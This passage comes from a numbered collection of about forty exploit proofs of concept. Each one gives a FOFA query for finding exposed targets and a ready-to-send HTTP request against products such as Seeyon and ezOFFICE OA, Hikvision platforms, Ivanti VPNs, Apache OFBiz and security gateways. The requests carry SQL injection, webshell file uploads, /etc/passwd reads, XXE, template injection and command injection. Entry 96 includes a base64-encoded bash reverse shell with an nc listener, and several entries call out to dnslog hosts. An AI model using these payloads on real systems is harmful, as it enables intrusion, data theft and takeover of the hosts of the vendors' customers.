path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file type
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 (Qi An Xin) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qi'anxin Wangshen (奇安信网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
    <params>
      <param>
      <value>
        <struct>
       <member>
          <name>test</name>
          <value>
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
          </value>
        </member>
      </struct>
      </value>
    </param>
    </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
